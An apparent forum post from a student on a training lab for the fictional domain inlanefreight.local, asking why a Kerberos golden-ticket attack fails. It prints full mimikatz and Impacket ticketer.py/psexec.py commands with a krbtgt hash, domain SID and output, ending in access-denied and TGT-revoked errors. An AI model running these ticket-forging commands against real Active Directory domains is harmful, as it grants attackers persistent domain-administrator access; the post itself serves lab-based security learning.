From Windows:
mimikatz # kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt
User : Administrator
Domain : inlanefreight.local (INLANEFREIGHT)
SID : S-1-5-21-2974783224-3764228556-2640795941
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: c0231bd8a4a4de92fca0760c0ba9e7a6 - rc4_hmac_nt
Lifetime : 12/28/2023 10:32:23 AM ; 12/25/2033 10:32:23 AM ; 12/25/2033 10:32:23 AM
→ Ticket : ** Pass The Ticket **
- PAC generated
- PAC signed
- EncTicketPart generated
- EncTicketPart encrypted
- KrbCred generated
Golden ticket for ‘Administrator @ inlanefreight.local’ successfully submitted for current session
PS C:\tools> klist
Current LogonId is 0:0x83356
Cached Tickets: (1)
#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:
PS C:\tools> Enter-PSSession dc01
Enter-PSSession : Connecting to remote server dc01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
- Enter-PSSession dc01
CategoryInfo : InvalidArgument: (dc01:String) [Enter-PSSession], PSRemotingTransportException
FullyQualifiedErrorId : CreateRemoteRunspaceFailed
PS C:\tools> klist
Current LogonId is 0:0x83356
Cached Tickets: (3)
#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 → forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 → DELEGATION
Kdc Called: DC01.INLANEFREIGHT.LOCAL
#1> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:
#2> Client: Administrator @ inlanefreight.local
Server: HTTP/dc01 @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 → forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.INLANEFREIGHT.LOCAL
From Linux:
└─# ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-2974783224-3764228556-2640795941 -domain inlanefreight.local -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[] Creating basic skeleton ticket and PAC Infos
[] Customizing ticket for inlanefreight.local/Administrator
[] PAC_LOGON_INFO
[] PAC_CLIENT_INFO_TYPE
[] EncTicketPart
[] EncAsRepPart
[] Signing/Encrypting final ticket
[] PAC_SERVER_CHECKSUM
[] PAC_PRIVSVR_CHECKSUM
[] EncTicketPart
[] EncASRepPart
[] Saving ticket in Administrator.ccache
┌──(root💀kali)-[~]
└─# export KRB5CCNAME=./Administrator.ccache
┌──(root💀kali)-[~]
└─# psexec.py -k -no-pass dc01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
Which a google search points to here:
Question: is anyone able to solve this or should Support provide the AES256 key for the KRBTGT account so that we can solve the lab?